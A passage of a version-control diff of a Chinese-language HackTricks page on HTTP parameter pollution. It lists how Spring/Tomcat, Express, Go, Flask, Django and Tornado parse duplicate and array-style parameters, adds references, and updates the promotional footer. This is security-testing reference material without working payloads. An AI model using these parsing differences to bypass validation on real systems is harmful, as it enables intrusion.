+<figure><img src="../.gitbook/assets/image (1257).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*kKxtZ8qEmgTIMS81py5hhg.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*kKxtZ8qEmgTIMS81py5hhg.jpeg</a></p></figcaption></figure>
+
+1. 使用 & 和 ; 分隔符来分割参数。
+2. 不识别 name\[]。
+3. 优先考虑第一个参数。
+
+### Spring MVC 6.0.23 和 Apache Tomcat 10.1.30 <a href="#dd68" id="dd68"></a>
+
+<figure><img src="../.gitbook/assets/image (1258).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*llG22MF1gPTYZYFVCmCiVw.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*llG22MF1gPTYZYFVCmCiVw.jpeg</a></p></figcaption></figure>
+
+1. POST RequestMapping == PostMapping & GET RequestMapping == GetMapping。
+2. POST RequestMapping & PostMapping 识别 name\[]。
+3. 如果 name 和 name\[] 同时存在，优先考虑 name。
+4. 连接参数，例如 first,last。
+5. POST RequestMapping & PostMapping 识别带有 Content-Type 的查询参数。
+
+### **NodeJS** 20.17.0 **和** Express 4.21.0 <a href="#id-6d72" id="id-6d72"></a>
+
+<figure><img src="../.gitbook/assets/image (1259).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*JzNkLOSW7orcHXswtMHGMA.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*JzNkLOSW7orcHXswtMHGMA.jpeg</a></p></figcaption></figure>
+
+1. 识别 name\[]。
+2. 连接参数，例如 first,last。
+
+### GO 1.22.7 <a href="#id-63dc" id="id-63dc"></a>
+
+<figure><img src="../.gitbook/assets/image (1260).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NVvN1N8sL4g_Gi796FzlZA.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NVvN1N8sL4g_Gi796FzlZA.jpeg</a></p></figcaption></figure>
+
+1. 不识别 name\[]。
+2. 优先考虑第一个参数。
+
+### Python 3.12.6 和 Werkzeug 3.0.4 和 Flask 3.0.3 <a href="#b853" id="b853"></a>
+
+<figure><img src="../.gitbook/assets/image (1261).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*Se5467PFFjIlmT3O7KNlWQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*Se5467PFFjIlmT3O7KNlWQ.jpeg</a></p></figcaption></figure>
+
+1. 不识别 name\[]。
+2. 优先考虑第一个参数。
+
+### Python 3.12.6 和 Django 4.2.15 <a href="#id-8079" id="id-8079"></a>
+
+<figure><img src="../.gitbook/assets/image (1262).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rf38VXut5YhAx0ZhUzgT8Q.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*rf38VXut5YhAx0ZhUzgT8Q.jpeg</a></p></figcaption></figure>
+
+1. 不识别 name\[]。
+2. 优先考虑最后一个参数。
+
+### Python 3.12.6 和 Tornado 6.4.1 <a href="#id-2ad8" id="id-2ad8"></a>
+
+<figure><img src="../.gitbook/assets/image (1263).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*obCn7xahDc296JZccXM2qQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*obCn7xahDc296JZccXM2qQ.jpeg</a></p></figcaption></figure>
+
+1. 不识别 name\[]。
+2. 优先考虑最后一个参数。
 
 ## 参考文献
+
 * [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)
 * [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution)
+* [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
 
 <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
-
 {% hint style="success" %}
-学习与实践 AWS 黑客技术：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
-学习与实践 GCP 黑客技术：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+学习与实践 AWS 黑客技术：<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
+学习与实践 GCP 黑客技术： <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
 
 <details>
 
@@ -86,7 +154,7 @@ Web 技术处理重复 HTTP 参数的方式各不相同，影响其对 HPP 攻
 
 * 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
 * **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
-* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
+* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
 
 </details>
 {% endhint %}